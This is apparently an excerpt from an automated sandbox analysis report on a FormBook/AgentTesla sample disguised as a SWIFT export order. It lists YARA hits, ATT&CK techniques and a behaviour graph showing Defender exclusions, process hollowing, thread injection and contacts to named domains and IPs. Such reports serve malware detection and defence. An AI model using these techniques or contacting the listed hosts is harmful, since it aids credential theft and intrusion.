          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Process Injection512Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11LSASS MemorySecurity Software Discovery321Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery112Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528704 Sample: TT_SWIFT_Export Order_noref... Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 39 www.oki-net.com 2->39 41 www.elderlycareacademy.com 2->41 43 webredir.vip.gandi.net 2->43 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 14 other signatures 2->57 8 TT_SWIFT_Export Order_noref S10SMG00318021.exe 6 2->8         started        signatures3 process4 file5 35 C:\Users\user\AppData\Roaming\AnsPejV.exe, PE32 8->35 dropped 37 C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, XML 8->37 dropped 67 Adds a directory exclusion to Windows Defender 8->67 12 TT_SWIFT_Export Order_noref S10SMG00318021.exe 8->12         started        15 powershell.exe 23 8->15         started        17 powershell.exe 25 8->17         started        19 schtasks.exe 1 8->19         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 12->69 71 Maps a DLL or memory area into another process 12->71 73 Sample uses process hollowing technique 12->73 75 Queues an APC in another process (thread injection) 12->75 21 help.exe 12->21         started        24 explorer.exe 12->24 injected 27 autochk.exe 12->27         started        29 conhost.exe 15->29         started        31 conhost.exe 17->31         started        33 conhost.exe 19->33         started        process9 dnsIp10 59 Modifies the context of a thread in another process (thread injection) 21->59 61 Maps a DLL or memory area into another process 21->61 63 Tries to detect virtualization through RDTSC time measurements 21->63 45 www.wamhsh.com 156.226.250.165, 49782, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 24->45 47 www.aarondecker.online 209.17.116.163, 49786, 80 DEFENSE-NETUS United States 24->47 49 7 other IPs or domains 24->49 65 System process connects to network (likely due to code injection or exploit) 24->65 signatures11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TT_SWIFT_Export Order_noref S10SMG00318021.exe36%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\AnsPejV.exe36%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
